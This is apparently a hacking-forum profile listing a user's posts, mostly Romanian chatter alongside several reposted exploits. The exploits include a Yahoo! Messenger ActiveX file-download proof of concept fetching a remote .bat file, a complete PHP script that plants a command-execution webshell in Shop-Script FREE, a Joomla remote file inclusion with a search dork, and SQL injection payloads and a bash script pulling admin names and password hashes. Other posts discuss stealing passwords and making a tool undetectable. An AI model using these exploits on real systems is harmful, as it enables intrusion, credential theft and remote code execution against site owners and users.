-
Posts
669 -
Joined
-
Last visited
-
Days Won
2
Everything posted by nullbyte
-
<pre> <code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">----------------------------------------------------------------------------- [b]Yahoo! Messenger 8.1.0.421 CYFT Object (ft60.dll) Arbitrary File Download[/b] url: [url]http://download.yahoo.com/dl/msgr8/us/ymsgr8us.exe[/url] Author: shinnai mail: shinnai[at]autistici[dot]org site: [url]http://shinnai.altervista.org[/url] [b]<font color='red'>This was written for educational purpose. Use it at your own risk. Author will be not responsible for any damage.</font>[/b] Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7 [b]Marked as: RegKey Safe for Script: False RegkeySafe for Init: False KillBitSet: False[/b] From remote: depends by Internet Explorer settings From local: yes [b]Description: This contron contains a "GetFile()" method which allows to download, on user's pc, an arbitrary file pased as argument. Remote execution depends by Internet Explorer settings, local execution works very well.[/b] [b]greetz to:<font color='red'> skyhole (or YAG KOHHA)</font> for inspiration[/b] ----------------------------------------------------------------------------- <object classid='clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F' id='test'></object> <input language=VBScript onclick=tryMe() type=button value='Click here to start the test'> <script language='vbscript'> Sub tryMe test.GetFile "http://www.shinnai.altervista.org/shinnai.bat","c:\\shinnai.bat",5,1,"shinnai" MsgBox "Exploit completed" End Sub </script> </span></span> </code></pre>
-
<?php ## Shop-Script FREE <= 2.0 Remote Command Execution Exploit by InATeam ## tested on versions 1.2 and 2.0 ## works regardless magic_quotes_gpc=on ## Greetz: eXp, Kuzya, cxim, Russian, ENFIX echo "--------------------------------------------------------\n"; echo "Shop-Script FREE <= 2.0 Remote Command Execution Exploit\n"; echo "(c)oded by Raz0r, InATeam (InAttack.Ru)\n"; echo "dork: \"Powered by Shop-Script FREE\"\n"; echo "--------------------------------------------------------\n"; if ($argc<2) { echo "USAGE:\n"; echo "~~~~~~\n"; echo "php {$argv[0]} [url] [cmd]\n\n"; echo "[url] - target server where Shop-Script FREE is installed\n"; echo "[cmd] - command to execute\n\n"; echo "e.g. php {$argv[0]} [url]http://site.com/shop/[/url] \"ls -la\"\n"; echo " php {$argv[0]} [url]http://shop.site.com:8080/[/url] \"cat cfg/connect.inc.php\"\n"; die; } /** * software site: [url]http://shop-script.com/[/url] * * i) admin authorization bypass * vulnerable code in admin.php near lines 37-41: * ------------------[source code]---------------------- * if (!isset($_SESSION["log"]) || !isset($_SESSION["pass"])) //unauthorized * { * //show authorization form * header("Location: access_admin.php"); * } * ------------------[/source code]--------------------- * unathorized user wiil be redirected to the page with the auth form but the script will continue running. * So, admin panel can be accessed by ignoring "Location" header. Solution: * ------------------[source code]---------------------- * if (!isset($_SESSION["log"]) || !isset($_SESSION["pass"])) //unauthorized * { * //show authorization form * header("Location: access_admin.php"); * die; * } * ------------------[/source code]--------------------- * ii) arbitrary php code injection * vulnerable code in /includes/admin/sub/conf_appearence.php near lines 29-38: * ------------------[source code]---------------------- * $f = fopen("./cfg/appearence.inc.php","w"); * fputs($f,"<?php\n\tdefine('CONF_PRODUCTS_PER_PAGE', '".str_replace("'","\'",stripslashes($_POST["productscount"]))."');\n"); * fputs($f,"\tdefine('CONF_COLUMNS_PER_PAGE', '".str_replace("\\\"","\"",$_POST["colscount"])."');\n"); * ... * fputs($f,"\tdefine('CONF_LIGHT_COLOR', '".str_replace("\\\"","\"",$_POST["lightcolor"])."');\n?>"); * fclose($f); * ------------------[/source code]--------------------- * specially formed POST data will break the config file's structure. So, it is possible to inject * arbitrary php code in /cfg/appearence.inc.php. Solution: filtering backslash and single quote characters. */ error_reporting(0); set_time_limit(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",10); $url = $argv[1]; $cmd = $argv[2]; $url_parts = parse_url($url); $host = $url_parts['host']; $path = $url_parts['path']; if (isset($url_parts['port'])) $port = $url_parts['port']; else $port = 80; $packet ="GET {$path}admin.php?dpt=conf?=appearence HTTP/1.0\r\n"; $packet.="Host: {$host}\r\n"; $packet.="User-Agent: InAttack evil agent\r\n"; $packet.="Connection: close\r\n\r\n"; $resp = send($packet); echo "[~] Connecting to $host..."; $resp ? print(" OK\n") : die(" failed"); $inputnames=array("productscount","colscount","darkcolor","middlecolor","lightcolor","add2cart","bestchoice"); $matches=array(); foreach($inputnames as $input) { if (preg_match('@<input type=text name='.$input.' value="([^"]*)">@',$resp,$matches)) $inputvalues[$input] = urlencode($matches[1]); elseif (preg_match('@<input type=checkbox name='.$input.' checked>@',$resp,$matches)) $inputvalues[$input] = "on"; } if (!isset($inputvalues) || sizeof($inputvalues)==0) die("[-] Exploit failed"); echo "[~] Sending shellcode..."; $data = makedata(1); $packet = "POST {$path}admin.php HTTP/1.0\r\n"; $packet.= "Host: $host\r\n"; $packet.= "User-Agent: InAttack evil agent\r\n"; $packet.= "Content-Length: ".strlen($data)."\r\n"; $packet.= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet.= "Connection: keep-alive\r\n\r\n"; $packet.= $data; $resp = send($packet); $resp ? print(" OK\n") : die(" failed"); echo "[~] Executing command..."; $packet ="GET {$path}index.php?cmd=".urlencode($cmd)." HTTP/1.0\r\n"; $packet.="Host: {$host}\r\n"; $packet.="User-Agent: InAttack evil agent\r\n"; $packet.="Connection: close\r\n\r\n"; $resp = send($packet); $matches=array(); if (!preg_match('@InAttack(.*?)InAttack@s',$resp,$matches))echo("failed\n"); else (($result = $matches[1]) == 's4f3_m0d3') ? print(" failed\n[-] Safe_mode=On\n") : (($result == 'd1s4bl3d') ? print(" failed\n[-] system() is disabled\n") : printf(" OK\n%'-56s\n%s%'-56s\n",'',$result,'')); echo "[~] Restoring values..."; $data = makedata(); $packet = "POST {$path}admin.php HTTP/1.0\r\n"; $packet.= "Host: $host\r\n"; $packet.= "User-Agent: InAttack evil agent\r\n"; $packet.= "Content-Length: ".strlen($data)."\r\n"; $packet.= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet.= "Connection: keep-alive\r\n\r\n"; $packet.= $data; $resp = send($packet); $resp ? print(" OK\n") : die(" failed"); function send($packet) { global $host,$port; $ock = @fsockopen(@gethostbyname($host),$port); if (!$ock) return false; else { fputs($ock, $packet); $html=''; while (!feof($ock)) $html.=fgets($ock); } return $html; } function makedata($modifyvalues=0) { global $inputvalues; $shellcode = '\');if(!empty($_GET["cmd"])&&!defined("INA")){echo"InAttack";if(!ini_get("safe_mode")){if(strpos(ini_get("disable_functions"),"system")===false){$c=$_GET["cmd"];if(get_magic_quotes_gpc()){$c=stripslashes($c);}system($c);}else{echo"d1s4bl3d";}}else{echo"s4f3_m0d3";}echo"InAttack";define("INA",true);}//'; $data = "dpt=conf&"; $data.= "sub=appearence&"; $data.= "save_appearence=1&"; $data.= "productscount={$inputvalues['productscount']}"; if ($modifyvalues==1) $data.=urlencode("\\".$shellcode)."&"; else $data.="&"; $data.= "colscount={$inputvalues['colscount']}"; if ($modifyvalues==1) $data.=urlencode($shellcode)."&"; else $data.="&"; $data.= "darkcolor={$inputvalues['darkcolor']}"; if ($modifyvalues==1) $data.=urlencode("\\\\".$shellcode)."&"; else $data.="&"; $data.= "middlecolor={$inputvalues['middlecolor']}&"; $data.= "lightcolor={$inputvalues['lightcolor']}&"; $data.= "add2cart={$inputvalues['add2cart']}&"; $data.= "bestchoice={$inputvalues['bestchoice']}"; return $data; } ## EOF ?>
-
Nu cred. Btw: Flud
-
###################################### # Joom!12Pic Component RFI # ###################################### Bug in : /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site= Variable : $mosConfig_live_site Dork: "com_joom12pic" Example: [url]http://xxx.net/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=[/url][attacker] Greets to all Irc.RealWorm.Net #Morgan Users
-
SimpCMS <= all Remote SQL Injection Vulnerability Found By : ú Cold z3ro , [url]http://www.hackteach.org/[/url] Script : [url]http://www.simpcms.com/[/url] ==================================== Exploit : /index.php?site=search&keyword=1)'/**/union/**/select/**/0,1,2,3,name,5,6/**/from/**/categories/* OR /index.php?site=search in search area insert your query $query = 1)'/**/union/**/select/**/0,1,2,3,$COLUMN,5,6/**/from/**/$TABLE/* $TABLE = "categories" OR "news" OR "mysql.user" OR "mysql.db" OR "information_schema.tables" $COLUMN = "name" OR "id" OR "username" OR "password" Examples : /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\ 1 ) From $TABLE categories : /index.php?site=search&keyword=1)'/**/union/**/select/**/0,1,2,3,name,5,6/**/from/**/categories/* /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\ 2 ) From $TABLE news : /index.php?site=search&keyword=1)'/**/union/**/select/**/0,1,2,3,id,5,6/**/from/**/news/* /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\ 3 ) From $TABLE mysql.user : /index.php?site=search&keyword=1)'/**/union/**/select/**/0,1,2,3,username,5,6/**/from/**/mysql.user/* /index.php?site=search&keyword=1)'/**/union/**/select/**/0,1,2,3,password,5,6/**/from/**/mysql.user/* /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\ ==================================== Live Example : [url]http://www.simpcms.com/medium/normal/index.php?site=search&keyword=1[/url])'/**/union/**/select/**/0,user(),database(),3,name,5,6/**/from/**/categories/*
-
#/bin/bash #################################################################################################################### # # # Omnistar Article Manager Software (article.php) Remote SQL Injection Exploit # # # # Exploit Coded By : Cold z3ro # # # # [url]http://Hackteach.org[/url] # # # # # # Exploit : /article.php?op=favorite&article_id=4&page_id=-1'/**/union/**/select/**/name,1/**/from/**/user/* # # /article.php?op=favorite&article_id=4&page_id=-1'/**/union/**/select/**/password,1/**/from/**/user/* # # # # Example : [url]http://demo.hostcontroladmin.com/demo_press2/articles/[/url] # # # #################################################################################################################### URL=$1; PATH="$2/"; echo -e "\n"; echo -e "\n"; echo -e "######################################################################################" echo -e "# Omnistar Article Manager Software (article.php) Remote SQL Injection Exploit #" echo -e "# Exploit Coded By By : Cold z3ro #" echo -e "# [url]http://Hackteach.org[/url] #" echo -e "######################################################################################" if [ "$URL" = "" ]; then echo -e "\n USAGE: $0 [URL] [NukePath]" echo -e " Example: $0 [url]www.victim.net[/url] NukePath\n" exit fi; if [ $PATH = "/" ]; then PATH=""; fi; name_query_url="http://$URL/$PATH""article.php?op=favorite&article_id=4&page_id=-1'/**/union/**/select/**/name,1/**/from/**/user/*"; password_query_url="http://$URL/$PATH""article.php?op=favorite&article_id=4&page_id=-1'/**/union/**/select/**/password,1/**/from/**/user/*"; echo -e "\n"; echo -e "\n"; echo -e "Direct Query URL For Admin name: \n"; echo -e ""$name_query_url"\n"; echo -e "\n"; echo -e "Direct Query URL For Admin Hash:\n"; echo -e ""$password_query_url"\n";
-
gata mi'am gasit o noua ocupatzie : dau search all posts by lexx si citesc ... raman uimit ... mi se goleshte mintea ... si evident citesc din nou pt ca mi s'a golit mintea .... raman uimit ... mi se goleshte mintea ... si evident citesc din nou pt ca mi s'a golit mintea .... raman uimit ... mi se goleshte mintea ... si evident citesc din nou pt ca mi s'a golit mintea .... raman uimit ... mi se goleshte mintea ... si evident citesc din nou pt ca mi s'a golit mintea .... raman uimit ... mi se goleshte mintea ... si evident citesc din nou pt ca mi s'a golit mintea .... raman uimit ... mi se goleshte mintea ... si evident citesc din nou pt ca mi s'a golit mintea .... raman uimit ... mi se goleshte mintea ... si evident citesc din nou pt ca mi s'a golit mintea .... raman uimit ... mi se goleshte mintea ... si evident citesc din nou pt ca mi s'a golit mintea .... raman uimit ... mi se goleshte mintea ... si evident citesc din nou pt ca mi s'a golit mintea .... raman uimit ... mi se goleshte mintea ... si evident citesc din nou pt ca mi s'a golit mintea .... raman uimit ... mi se goleshte mintea ... si evident citesc din nou pt ca mi s'a golit mintea .... raman uimit ... mi se goleshte mintea ... si evident citesc din nou pt ca mi s'a golit mintea .... raman uimit ... mi se goleshte mintea ... si evident citesc din nou pt ca mi s'a golit mintea .... raman uimit ... mi se goleshte mintea ... si evident citesc din nou pt ca mi s'a golit mintea .... raman uimit ... mi se goleshte mintea ... si evident citesc din nou pt ca mi s'a golit mintea .... raman uimit ... mi se goleshte mintea ... si evident citesc din nou pt ca mi s'a golit mintea .... raman uimit ... mi se goleshte mintea ... ce ziceam ? wtf ? eu faceam misto de el mah daca nu te-ai prins Si el de tine
-
Datz nice. Keep up D good workz
-
Poti sa-l faci nedetectabil.
-
O fi fost violata [ sau pedo]
-
http://www.ascentive.com/support/new/libraryfiles.exe
-
Gresit. Ai facut macar click? www.nbs.ej.am/Hi5/Smileys <<< --- Asta e
-
Sunt f. incepator in VB (6.0) deci va rog... www.nbs.ej.am/Hi5 :!: Deci, cum vi se pare softwareul? Stiu ca exista si un site, dar prefer software decat 'webware'...
-
im fukin dumb -- chiar mere ... tfs! :twisted: :twisted:
-
Is our passion. But how the fuck we can steal passwords, by simply asking the users??? Iti bati joc de noi lol
-
Greu de crezut Intrebi victima daca iti da parola? :?
-
BulletProofSoft Home Page - Spyware Remover Spyware Adware Remover Free Spyware Removal Adware Removal AntiSpyware Free Anti Spyware Software MP3 to WAV converter, MP3 converter, MP3 to WAV decoder, WAV to MP3 encoder - PC System Tweak - BPS Phishing Blaster Pe acela il folosesc si nu am probleme cu el
-
Ai vrut pussy ti-a dat pussy
-
AM SCRIS CA PAROLELE SE AFLA IN /shadow si nu ai sanse. Mai citeste si jos, nu doar primul post :evil: :evil:
-
zbeng, parolele sunt in shadow...
-
Old re.. le stiu de ieri
-
Ceva de genul: AddType application/x-httpd-php .extensie
-
Dat is kool.. Thx re (That is cool) (Thanks buddy am scris )